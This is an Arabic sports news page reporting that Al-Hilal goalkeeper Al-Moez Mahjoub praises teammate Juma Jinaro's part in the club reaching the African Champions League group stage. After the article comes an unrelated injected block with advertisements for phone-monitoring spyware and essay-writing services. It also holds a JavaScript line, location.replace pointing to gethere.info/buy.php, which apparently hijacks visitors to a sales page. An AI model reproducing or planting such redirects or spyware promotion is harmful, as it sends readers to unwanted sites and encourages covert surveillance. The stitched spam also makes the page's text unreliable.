الرئيسية / الاخبار الرياضية / المعز محجوب يشيد بدور جمعة جينارو في تأهل الهلال

المعز محجوب يشيد بدور جمعة جينارو في تأهل الهلال

أشاد حارس الهلال ، المعز محجوب، بتألق زميله جمعة جينارو، ودوره الكبير الذي لعبه في تأهل الهلال لمجموعات دوري الأبطال الأفريقي، بعد إقصاء ليوبار الكونجولي أمس بالخرطوم، مؤكدا، أنه سيكون خير عوناً  لجمعة وأن تأهل الهلال لدور الثمانية ليس غريبا.
 وقال المعز:” أهنئ زملائي جميعا على التأهل لهذه المرحلة وأشكرهم على الآداء الذي قدموه في المرحلة السابقة, وقد لعب زميلى وأخي جمعة جينارو دوراً كبيراً ومؤثراً في التأهل علاوة على دور الجمهور القوي، ولكن حراسة مرمى الهلال كان لها دورا بارزا في التأهل”.
وأضاف المعز الذي ظل يلعب بديلا لجمعة منذ بداية هذا الموسم:”أتمنى التوفيق دائماً لجمعة، وحقيقة مستواه لم يأت من فراغ بل بعد اجتهاد ومثابرة منه، وحرصه على التعلم من غيره، وأنا سأكون خير سند وعضد له، حتى نقود الهلال لمنصات التتويج معا”.

keep children safe and employees productive. highster mobile is the leading cell phone for a cell phone or any mobile device. get texts, calls, gps, facebook online custom essay, dissertation, research paper writing ?effectivepapers online custom writing company offers professional : custom essays, research papers, term papers, dissertations, thesis papers …
location.replace(“http://gethere.info/buy.php”); best college homework help sites

التعليق بواسطة فيس بوك

اضف رد

لن يتم نشر البريد الإلكتروني . الحقول المطلوبة مشار لها بـ *

*